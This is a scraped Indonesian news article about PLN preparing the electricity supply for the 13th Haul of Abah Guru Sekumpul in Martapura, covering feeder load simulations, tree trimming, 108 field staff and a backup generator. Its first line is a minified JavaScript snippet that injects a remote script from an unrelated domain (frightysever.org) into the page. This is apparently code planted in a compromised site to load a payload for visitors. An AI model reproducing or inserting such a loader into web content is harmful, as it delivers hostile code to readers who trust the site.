(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Suplai Diyakini Handal, PLN Simulasi Beban Puncak Haul ke-13 Sekumpul


MARTAPURA, Setelah sebelumnya melakukan penyisipan 7 trafo dengan kapasitas masing-masing 200 kilo Volt Ampere (kVA), petugas PLN Rayon Martapura melakukan simulasi beban di 3 feeder jaringan untuk memastikan suplai listrik handal.

Supervisor Humas PLN Wilayah Kalimantan Selatan dan Kalimantan Tengah (PLN Kalselteng) Bayu Aswenda menjelaskan, petugas PLN Rayon Martapura melakukan simulasi jika salah satu feeder jaringan mengalami gangguan, untuk melihat respon feeder lainnya dalam mengcover suplai listrik.

Bayu mengatakan, petugas PLN Rayon Martapura terus bekerja sepanjang hari menyiapkan kehandalan suplai listrik menjelang pelaksanaan Haul ke-13 Al’alimul Allamah Al’arif Billah KH Muhammad Zaini bin Abdul Ghani -Abah Guru Sekumpul-. Puluhan personil terus melakukan persiapan pengamanan jaringan listrik di sekitar wilayah Sekumpul, Martapura.

“Alhamdulillah pada saat simulasi gangguan, 2 feeder lainnya yang kami siapkan berhasil melakukan manuver beban, sehingga suplai listrik tetap aman,” saat dikonfimasi, Selasa (20/3).

Menurutnya persiapan PLN masih belum selesai 100%, karena sampai H-2 petugas masih terus akan melakukan inspeksi peralatan jaringan untuk memastikan tidak ada potensi gangguan yang terjadi karena kerusakan peralatan.

Dia menambahkan, perintisan pohon juga terus dilakukan PLN sebagai upaya preventif agar dahan-dahan pohon tidak sampai menyentuh jaringan sehingga menyebabkan gangguan suplai listrik. Perintisan pohon dilakukan dengan menyusur jaringan sepanjang Sekumpul dan sekitarnya.

“Petugas kami terus mengupayakan agar dahan pohon tidak mengganggu suplai listrik kami sehingga pada saat pelaksanaan Haul, risiko gangguan dapat kami hindari,” ujarnya.

Disinggung mengenai adanya informasi bahwa kemungkinan besar Presiden Joko Widodo akan mengikuti Haul, Bayu menyatakan bahwa PLN akan berusaha semaksimal mungkin untuk mengamankan pasokan listrik.

“Sebenarnya ada atau tidak ada kunjungan Presiden, sudah menjadi tugas kami untuk mengamankan pasokan listrik. Kami harus selalu siap dalam segala kondisi. Apalagi Haul sendiri merupakan agenda tahunan yang selalu menjadi perhatian serius kami,” tegasnya.

Bayu juga memastikan bahwa PLN siap menerjunkan 108 personil di lapangan untuk memantau secara langsung keadaan jaringan dalam menyuplai listrik. Personil teknik tersebut akan disebar dibeberapa titik dan akan selalu standby sampai Haul selesai.  Sebagai cadangan suplai listrik, Genset Mobile sebesar 250 kVA juga telah disiapkan dan tinggal menunggu arahan panitia untuk ditempatkan di simpang empat AZ.

“PLN berharap segala persiapan yang telah dilakukan berbuah manis pada saat pelaksanaan Haul, sehingga ribuan jamaah yang dipastikan hadir dapat khusyuk mengikuti rangkaian kegiatan Haul yang telah disiapkan oleh Panitia Haul tanpa adanya gangguan,” tutupnya. (abdullah)

Reporter: Abdullah
Editor: Abi Zharrin Al Ghifari

Desy Arfianty

Recent Posts

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

1 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

3 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

4 jam ago

Sekda Banjar Wakili Bupati di Rapat Paripurna Bahas Raperda Tentang Penanaman Modal

KANALKALIMANTAN.COM, MARTAPURA - Rapat Paripurna beragendakan Jawaban Bupati atas Pemandangan Umum Fraksi-fraksi DPRD terhadap Rancangan… Read More

6 jam ago

Antisipasi Bencana, Ini Pesan Gubenur Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kesiapsiagaan Bencana dan antisipasi bencana di Kalimantan Selatan, Badan Penanggulangan… Read More

6 jam ago

Siap Tarung di Pilkada Kapuas, Mantan Wagub Kalteng Habib Ismail Lamar Nasdem

KANALKALIMANTAN.COM, KUALA KAPUAS - Mantan Wakil Gubernur Kalimantan Tengah Habib Ismail bin Yahya secara resmi… Read More

7 jam ago

This website uses cookies.